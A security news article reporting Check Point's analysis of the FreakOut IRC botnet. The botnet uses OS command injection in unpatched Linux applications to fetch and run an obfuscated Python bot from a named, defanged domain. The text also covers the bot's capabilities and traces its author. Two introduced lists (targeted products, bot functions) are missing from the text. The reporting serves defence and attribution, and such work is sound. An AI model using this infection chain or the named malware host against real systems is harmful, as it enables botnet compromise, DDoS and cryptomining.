Security researchers from Check Point have uncovered a series of attacks associated with the FreakOut botnet that is targeting multiple unpatched flaws in applications running on top of Linux systems.
The botnet appeared in the threat landscape in November 2020, in some cases the attacks leveraged recently disclosed vulnerabilities to inject OS commands. The attacks aimed at compromising the target systems to create an IRC botnet, which can later be used to conduct several malicious activities, including DDoS attacks and crypto-mining campaigns.
The attacks observed by Check Point aimed at devices that run one of the following products:
Once infected a device, it will be later used as an attacking platform.
Botnet operators are scanning the internet for vulnerable applications affected by one of the recently disclosed vulnerabilities and take over the underlying Linux system:
“In all the attacks involving these CVEs, the attacker’s first move is to try running different syntaxes of OS commands to download and execute a Python script named “out.py”.” reads the analysis published by Check Point. “After the script is downloaded and given permissions (using the “chmod” command), the attacker tries to run it using Python 2. Python 2 reached EOL (end-of-life) last year, meaning the attacker assumes the victim’s device has this deprecated product installed.”
The bot is an obfuscated Python script downloaded from the site https://gxbrowser[.]net consisting of polymorphic code.
The FreakOut botnet has a modular structure, it uses a specific function for each capability it supports. Below a list of functions implemented in the botnet:
The botnet could conduct multiple malicious activities by combining the above functions, such as delivering a cryptocurrency miners, launching DDoS, ot spreading laterally across the company network.
Check Point researchers analyzed the malicious code and were able to access the IRC channel used by the botmaster to control the botnet.
The botnet is in an early stage, at the time of the analysis, the IRC panel shows it was controlling only 188 bots.
Check Point experts were also able to track its author, who goes online with the moniker Freak.
“To identify the threat actors responsible for the attacks, we searched for leads in the internet and social media. Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels) and the IRC bot name “N3Cr0m0rPh”, revealed information about the threat actor behind the campaign.” continues the analysis.
“In a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for BitCoins (BTC).”
The analysis published by the experts includes the MITRE ATT&CK TECHNIQUES and protections (IoCs, IPS, and Anti-Bot).
(SecurityAffairs – hacking, FreakOut botnet)